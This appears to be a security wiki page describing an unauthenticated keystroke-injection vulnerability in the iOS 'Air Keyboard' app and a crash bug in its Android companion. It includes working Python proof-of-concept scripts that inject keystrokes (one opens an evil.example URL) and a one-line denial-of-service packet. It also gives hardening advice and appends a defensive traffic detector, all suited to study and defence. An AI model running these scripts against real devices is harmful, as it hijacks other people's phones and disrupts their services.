# Air Keyboard Remote Input Injection (Unauthenticated TCP / WebSocket Listener)

{{#include ../../banners/hacktricks-training.md}}

## TL;DR

The iOS version of the commercial app **"Air Keyboard"** (App Store ID 6463187929) exposes a local-network service that **accepts keystroke frames without any authentication or origin validation**. Depending on the installed version the service is:

* **≤ 1.0.4** – a raw TCP listener on **port 8888** expecting a 2-byte length header followed by a *device-id* and an ASCII payload.
* **≥ 1.0.5 (June 2025)** – a **WebSocket** listener on *the same port* (**8888**) that parses **JSON** keystrokes such as `{"type":1,"text":"…"}`.

Any device on the same Wi-Fi / subnet can therefore **inject arbitrary keyboard input into the victim's phone, achieving full remote interaction hijacking**.

The companion Android build listens on **port 55535**. It performs a weak AES-ECB handshake, but crafted garbage still triggers an **unhandled exception inside OpenSSL**, crashing the background service (**DoS**).

> The vulnerability is **still unpatched at the time of writing (July 2025)** and the app remains available on the App Store.

---

## 1. Service Discovery

Scan the local network and look for the two fixed ports used by the app:

```bash
# iOS (unauthenticated input-injection)
nmap -p 8888 --open 192.168.1.0/24

# Android (weakly-authenticated service)
nmap -p 55535 --open 192.168.1.0/24
```

On Android phones you can identify the responsible package locally:

```bash
adb shell netstat -tulpn | grep 55535   # no root required on emulator

# rooted device / Termux
netstat -tulpn | grep LISTEN
ls -l /proc/<PID>/cmdline                # map PID → package name
```

On **jailbroken iOS** you can do something similar with `lsof -i -nP | grep LISTEN | grep 8888`.

---

## 2. Protocol Details (iOS)

### 2.1 Legacy (≤ 1.0.4) – raw binary frames

```
[length (2 bytes little-endian)] [device_id (1 byte)] [payload ASCII keystrokes]
```

Note that the *length* includes the `device_id` byte **but not** the two-byte header itself.

### 2.2 Current (≥ 1.0.5) – JSON over WebSocket

Version 1.0.5 silently moved to WebSockets while keeping the port number unchanged. A minimal keystroke message looks like:

```json
{
  "type": 1,                // 1 = insert text, 2 = special key
  "text": "open -a Calculator\n",
  "mode": 0,
  "shiftKey": false,
  "selectionStart": 0,
  "selectionEnd": 0
}
```

No handshake, token or signature is required – the first JSON object already triggers the UI event.

---

## 3. PoC Exploitation

### 3.1 Targeting ≤ 1.0.4 (raw TCP)

```python
#!/usr/bin/env python3
"""Inject arbitrary keystrokes into Air Keyboard ≤ 1.0.4 (TCP mode)"""
import socket, sys

target_ip = sys.argv[1]               # e.g. 192.168.1.50
keystrokes = b"open -a Calculator\n"  # payload visible to the user

# 2-byte little-endian length = device_id (1) + payload; header itself is not counted
frame  = bytes([(len(keystrokes)+1) & 0xff, (len(keystrokes)+1) >> 8])
frame += b"\x01"                      # device_id = 1 (hard-coded)
frame += keystrokes

with socket.create_connection((target_ip, 8888)) as s:
    s.sendall(frame)
print("[+] Injected", keystrokes)
```

### 3.2 Targeting ≥ 1.0.5 (WebSocket)

```python
#!/usr/bin/env python3
"""Inject keystrokes into Air Keyboard ≥ 1.0.5 (WebSocket mode)"""
import json, sys, websocket  # `pip install websocket-client`

target_ip = sys.argv[1]
ws = websocket.create_connection(f"ws://{target_ip}:8888")
ws.send(json.dumps({
    "type": 1,
    "text": "https://evil.example\n",
    "mode": 0,
    "shiftKey": False,
    "selectionStart": 0,
    "selectionEnd": 0
}))
ws.close()
print("[+] URL opened on target browser")
```

*Any printable ASCII – including line-feeds, tabs and most special keys – can be sent, giving the attacker the same power as physical user input: launching apps, sending IMs, opening malicious URLs, changing settings, etc.*

---

## 4. Android Companion – Denial-of-Service

The Android port (55535) expects a **4-character password encrypted with a hard-coded AES-128-ECB key**, followed by a random nonce. Parsing errors bubble up to `AES_decrypt()` and are not caught, killing the listener thread. A single malformed packet is enough to take legitimate users offline until the process is restarted.

```python
import socket, sys

victim = sys.argv[1]  # IP of the Android companion
socket.create_connection((victim, 55535)).send(b"A"*32)  # minimal DoS
```

---

## 5. Related Apps – Recurring Vulnerability Pattern

Air Keyboard is **not an isolated case**. Other mobile "remote keyboard/mouse" apps have shipped with the same flaw:

* **Telepad ≤ 1.0.7** – CVE-2022-45477/78 allow unauthenticated command execution and clear-text keystroke logging.
* **PC Keyboard ≤ 30** – CVE-2022-45479/80 unauthenticated RCE & traffic sniffing.
* **Lazy Mouse ≤ 2.0.1** – CVE-2022-45481/82/83 no default password, brute-forceable weak PIN and clear-text leakage.

These examples show a systemic neglect of the **network-exposed attack surface in mobile apps**.

---

## 6. Root Causes

1. **No origin / integrity checks** on incoming frames (iOS).
2. **Cryptographic misuse** (static key, ECB, no length validation) and **missing exception handling** (Android).
3. **Local Network user permission ≠ security** – iOS asks for a runtime permission for LAN traffic, but that does not provide any real authentication.

---

## 7. Hardening & Defensive Measures

Recommendations for developers:

* Bind the listener to **`127.0.0.1`** and tunnel through **mTLS** or **Noise XX** if remote control is required.
* Derive **per-device secrets during onboarding** (e.g. a QR code or pairing PIN) and enforce *mutual authentication* before processing input.
* Adopt the **Apple Network Framework** with *NWListener* + TLS instead of raw sockets.
* Implement **length sanity checks** and structured exception handling when unpacking or decrypting frames.

Blue-/Red-Team quick wins:

* **Network hunting:** `sudo nmap -n -p 8888,55535 --open 192.168.0.0/16` or the Wireshark filter `tcp.port == 8888`.
* **Runtime inspection:** a Frida script hooking `socket()`/`NWConnection` to list unexpected listeners.
* **iOS App Privacy Report (Settings ▸ Privacy & Security ▸ App Privacy Report)** shows apps talking to LAN addresses – useful for spotting rogue services.
* **Mobile EDRs** can add simple Yara-L rules for the JSON keys `"selectionStart"`, `"selectionEnd"` inside clear-text TCP payload on port 8888.

---

## Cheat Sheet (Pentesters)

```bash
# Locate vulnerable devices in a /24 and print IP + list of open risky ports
nmap -n -p 8888,55535 --open 192.168.1.0/24 -oG - \
  | awk '/Ports/{print $2 " " $4}'

# Inspect running sockets on a connected Android target
adb shell "for p in $(lsof -PiTCP -sTCP:LISTEN -n -t); do \
  echo -n \"$p → \"; cat /proc/$p/cmdline; done"
```

---

## References

- [Exploit-DB 52333 – Air Keyboard iOS App 1.0.5 Remote Input Injection](https://www.exploit-db.com/exploits/52333)
- [Mobile-Hacker Blog (17 Jul 2025) – Remote Input Injection Vulnerability in Air Keyboard iOS App Still Unpatched](https://www.mobile-hacker.com/2025/07/17/remote-input-injection-vulnerability-in-air-keyboard-ios-app-still-unpatched/)

{{#include ../../banners/hacktricks-training.md}}
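The detection idea from section 7 (matching the JSON keys on port 8888) carried through as a small payload classifier, written as an added example for this page; it is not code from the original article or from the Air Keyboard app. It parses both wire formats described in section 2: the legacy `[len LE16][device_id][ASCII]` frame, validated against the length rule given there, and the WebSocket JSON command. One caveat the rule set should account for: client-to-server WebSocket frames are masked (RFC 6455 §5.3), so the keys `"selectionStart"`/`"selectionEnd"` are not literally grep-able in the raw TCP bytes; the example therefore unmasks the frame before matching. All sample payloads are constructed inline; the alert labels are invented for the example.

```python
#!/usr/bin/env python3
"""Flag Air Keyboard keystroke commands in TCP payloads destined to port 8888.

Added example (not the page's or the app's own code). Sample payloads below
are constructed, not real captures.
"""
import json
import struct

KEYSTROKE_KEYS = {"type", "text", "selectionStart", "selectionEnd"}


def parse_legacy_frame(data: bytes):
    """Return the ASCII keystrokes if `data` is a well-formed legacy frame, else None."""
    if len(data) < 4:
        return None
    length = struct.unpack("<H", data[:2])[0]
    if length != len(data) - 2:  # length counts device_id + payload, not the header
        return None
    try:
        return data[3:].decode("ascii")
    except UnicodeDecodeError:
        return None


def unmask_websocket_text(data: bytes):
    """Return the body of one client->server WebSocket text frame, else None.

    Client frames are masked (RFC 6455 section 5.3): the JSON is only
    readable after XOR-ing the body with the 4-byte mask.
    """
    if len(data) < 2 or (data[0] & 0x0F) != 0x1:  # opcode 0x1 = text frame
        return None
    masked, length, offset = bool(data[1] & 0x80), data[1] & 0x7F, 2
    if length == 126 and len(data) >= 4:
        length, offset = struct.unpack(">H", data[2:4])[0], 4
    elif length == 127 and len(data) >= 10:
        length, offset = struct.unpack(">Q", data[2:10])[0], 10
    elif length >= 126:
        return None  # extended length announced but header truncated
    if not masked:
        return None  # conforming clients never send unmasked frames
    mask, body = data[offset:offset + 4], data[offset + 4:offset + 4 + length]
    if len(mask) != 4 or len(body) != length:
        return None
    try:
        return bytes(b ^ mask[i % 4] for i, b in enumerate(body)).decode("utf-8")
    except UnicodeDecodeError:
        return None


def classify(port: int, data: bytes):
    """Return (alert_label, injected_text) for an Air Keyboard command, else None."""
    if port != 8888:
        return None
    text = unmask_websocket_text(data)
    if text is not None:
        try:
            obj = json.loads(text)
        except ValueError:
            obj = None
        if isinstance(obj, dict) and KEYSTROKE_KEYS <= set(obj):
            return ("airkeyboard-ws-keystroke", str(obj["text"]))
    legacy = parse_legacy_frame(data)
    if legacy is not None:
        return ("airkeyboard-legacy-keystroke", legacy)
    return None


def detect_all(events):
    """Run classify over (dst_port, payload) pairs and return the alerts raised."""
    return [hit for port, payload in events if (hit := classify(port, payload))]


def masked_text_frame(text: str, mask: bytes = b"\x12\x34\x56\x78") -> bytes:
    """Build a masked WebSocket text frame; used here only to construct samples."""
    body = text.encode()
    header = bytes([0x81, 0x80 | len(body)]) if len(body) < 126 \
        else bytes([0x81, 0x80 | 126]) + struct.pack(">H", len(body))
    return header + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(body))


# Constructed samples: a legacy frame, a WebSocket JSON command, an unrelated payload
SAMPLE_JSON = json.dumps({"type": 1, "text": "hello\n", "mode": 0, "shiftKey": False,
                          "selectionStart": 0, "selectionEnd": 0})
SAMPLE_LEGACY = struct.pack("<H", len(b"hello\n") + 1) + b"\x01" + b"hello\n"
SAMPLE_WS = masked_text_frame(SAMPLE_JSON)
SAMPLE_EVENTS = [(8888, SAMPLE_LEGACY), (8888, SAMPLE_WS),
                 (8888, b"GET / HTTP/1.1\r\n"), (443, SAMPLE_WS)]

if __name__ == "__main__":
    for label, text in detect_all(SAMPLE_EVENTS):
        print(f"[!] {label}: {text!r}")
```

Feed `classify()` the reassembled TCP payload of each client-to-server segment (e.g. from a Zeek or Scapy pipeline) rather than single packets, since a WebSocket frame may span segments; the length rule on the legacy format and the mask requirement on the WebSocket format keep unrelated port-8888 traffic from raising alerts.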